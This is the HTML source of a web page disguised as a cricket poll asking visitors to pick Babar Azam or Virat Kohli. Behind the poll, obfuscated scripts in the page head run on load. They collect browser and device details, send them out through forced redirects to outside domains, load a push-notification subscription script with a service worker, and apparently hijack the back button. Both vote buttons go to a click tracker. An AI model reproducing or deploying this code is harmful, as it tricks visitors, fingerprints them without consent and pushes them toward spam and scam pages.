
<!DOCTYPE html>
<html lang="en">
  <head>
    <script>
      var Back_Button_Zone = 8179555;
      var Domain_TB = "cigoumtoon.net";
    </script>
    <script async src="https://desenteir.com/3ad/4953e/reverse.min.js?sf=1"></script>
    <script>
    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
    var s = document.createElement('script');
    s.src='//ouphouch.com/3ad/4953e/mw.min.js?z=8179541'+'&sw=/sw-check-permissions-6a58b.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':
            Replace("//gaiwoafauchi.net/4/8179547");break;
            case 'onNotificationUnsupported':
            Replace("//gaiwoafauchi.net/4/8179547");break;
        }
    };
    document.head.appendChild(s);
</script>


    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="referrer" content="no-referrer" />
    <meta name="viewport" content="initial-scale=1,maximum-scale=1,user-scalable=no" />
    <style>
      body {
        background-color: #243651;
        text-align: center !important;
      }
      .top {
        color: #ff8000;
        font-size: 36px;
        font-weight: bold;
        font-family: 'Roboto';
        margin-top: 100px;
      }
      .center {
        color: #fff;
        margin-top: 25px;
        font-size: 40px;
        font-weight: bold;
        font-family: 'Roboto';
      }
      .bottom-btn {
        background-color: #ff8000;
        border: 0;
        width: 240px;
        height: 60px;
        color: #fff;
        margin-top: 30px;
        font-size: 24px;
        font-weight: bold;
      }
      .bottom-txt {
        color: #ececec;
        margin-top: 10px;
        font-size: 15px;
        font-weight: bold;
      }
      .content {
        max-width: 480px;
        margin: auto;
        }
    </style>
    <title>(1) Notification</title>
  </head>
  <body>
    <div class="content">
    <div class="top">🥇 Best Batsman?</div>
    <div class="center">Babar Azam vs. Virat Kohli</div>
    <button class="bottom-btn" onclick="window.location.href='https://ocerod.maxconvtrk.com/click';">Babar Azam</button><br>
    <button class="bottom-btn" onclick="window.location.href='https://ocerod.maxconvtrk.com/click';">Virat Kohli</button><br/><br/>
    <div class="bottom-txt">Pick your favourite for surprise</div>
    </div>
  </body>
</html>
